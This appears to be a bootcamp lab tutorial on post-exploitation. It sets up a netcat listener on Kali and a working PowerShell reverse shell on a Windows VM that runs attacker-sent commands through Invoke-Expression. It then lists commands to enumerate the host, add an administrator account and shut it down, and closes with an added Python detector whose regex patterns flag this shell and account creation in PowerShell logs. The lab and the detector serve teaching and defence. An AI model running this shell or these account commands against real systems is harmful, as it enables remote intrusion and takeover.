We need you! These exercises are created and maintained in collaboration with people like you. If you find any errors or typos, please contribute and/or report them.
This exercise aims to utilize Windows CMD commands in the context of a remote connection, simulating a remote hacking attack. This tutorial will help you establish a reverse shell from a Windows 10 machine to a Kali Linux machine, executing a series of commands to gather critical information from the Windows system. All of this will be done in a controlled environment, using virtual machines, and will focus on the post-exploitation phase of an ethical attack.
Netcat (pre-installed on Kali Linux)
Both virtual machines must be configured with the bridged adapter option so they can communicate over the local network.
Network Configuration: Verify that both machines can communicate using the ping command from Kali to Windows and vice versa.
Establish the connection with Netcat on the Kali Linux machine (Attacker). Open a terminal and listen on a specific port (in this case, port 4444) using Netcat:
```
nc -lvnp 4444
```
This will set up a listener on the Kali machine, waiting for a connection from Windows.
```powershell
$client = New-Object System.Net.Sockets.TCPClient("IP-de-Kali", 4444);
$stream = $client.GetStream();
$reader = New-Object System.IO.StreamReader($stream);
$writer = New-Object System.IO.StreamWriter($stream);
$writer.AutoFlush = $true;

while ($true) {
    $data = $reader.ReadLine();

    if ($data -eq "exit") { break }

    try {
        $result = Invoke-Expression $data 2>&1 | Out-String;
        $writer.WriteLine($result);
    } catch {
        $writer.WriteLine("Error: $_");
    }

    $writer.Flush();
}
```
Note: Remember to replace "IP-de-Kali" with the IP address of your Kali Linux machine.
With the script running on Windows, you can now send commands from Kali through the Netcat session you initiated. Here are some useful commands to interact with the Windows machine:
```
dir
systeminfo
ipconfig
tasklist
```
View system information:
```
hostname
```
List users on the system:
```
net user
```
View active network connections:
```
netstat -an
```
```
tasklist
```
```
mkdir C:\TestFolder
```
```
shutdown /s /t 0 # Shut down
shutdown /r /t 0 # Restart
```
```
net user nuevo_usuario contraseña /add
net localgroup Administradores nuevo_usuario /add
```
Research more commands to practice.
```
exit
```
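To see what this lab leaves behind for a defender, the following added example (not part of the original exercise) triages PowerShell script block logging events (Event ID 4104) for the pattern used by the script above and for the account-creation commands in the list. The event field names and the sample events are constructed for illustration, not a real export schema.

```python
import re

# Indicators taken from the lab script on this page: an outbound TCP client
# whose stream is read and whose input is passed to Invoke-Expression.
SHELL_INDICATORS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "stream_io": re.compile(r"\.GetStream\(\)|IO\.Stream(Reader|Writer)", re.I),
    "dynamic_exec": re.compile(r"\b(Invoke-Expression|iex)\b", re.I),
}
# Account changes from the lab's command list (the group name is locale-dependent,
# so the pattern does not rely on it).
ACCOUNT_CHANGE = re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup)\s+.+\s/add\b", re.I)


def classify(script_text):
    """Return the finding labels for one script block."""
    hits = {name for name, rx in SHELL_INDICATORS.items() if rx.search(script_text)}
    findings = []
    # Any single indicator is common in admin scripts; all three together are not.
    if hits == set(SHELL_INDICATORS):
        findings.append("network-fed-command-loop")
    if ACCOUNT_CHANGE.search(script_text):
        findings.append("local-account-change")
    return findings


def triage(events):
    """Map record id -> findings for script block events (ID 4104) that match."""
    scored = {ev["record_id"]: classify(ev["script_block_text"])
              for ev in events if ev["event_id"] == 4104}
    return {rid: found for rid, found in scored.items() if found}


# Constructed sample events (field names are assumptions; 192.0.2.10 is a
# documentation address standing in for the lab's Kali machine).
SAMPLE_EVENTS = [
    {"record_id": 101, "event_id": 4104, "script_block_text":
        '$client = New-Object System.Net.Sockets.TCPClient("192.0.2.10", 4444); '
        '$stream = $client.GetStream(); $result = Invoke-Expression $data 2>&1'},
    {"record_id": 102, "event_id": 4104, "script_block_text": "net user labuser Passw0rd! /add"},
    {"record_id": 103, "event_id": 4104, "script_block_text": "Test-NetConnection 192.0.2.10 -Port 443"},
    {"record_id": 104, "event_id": 4103, "script_block_text": "Invoke-Expression $data"},
]

if __name__ == "__main__":
    for rid, found in triage(SAMPLE_EVENTS).items():
        print(rid, ", ".join(found))
```

Requiring all three indicators together keeps ordinary administrative scripts that use only `Invoke-Expression` or only a TCP client out of the results.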
Thanks to these amazing people (emoji key):
Rosinni Rodriguez (rosinni) contribution: (build-tutorial) ✅, (documentation) 📖
Alejandro Sanchez (alesanchezr), contribution: (bug reports) 🐛
This project follows the all-contributors specification. Contributions of any kind are welcome!
This and other exercises are used to learn to code by students at 4Geeks Academy Coding Bootcamp led by Alejandro Sánchez and many other contributors.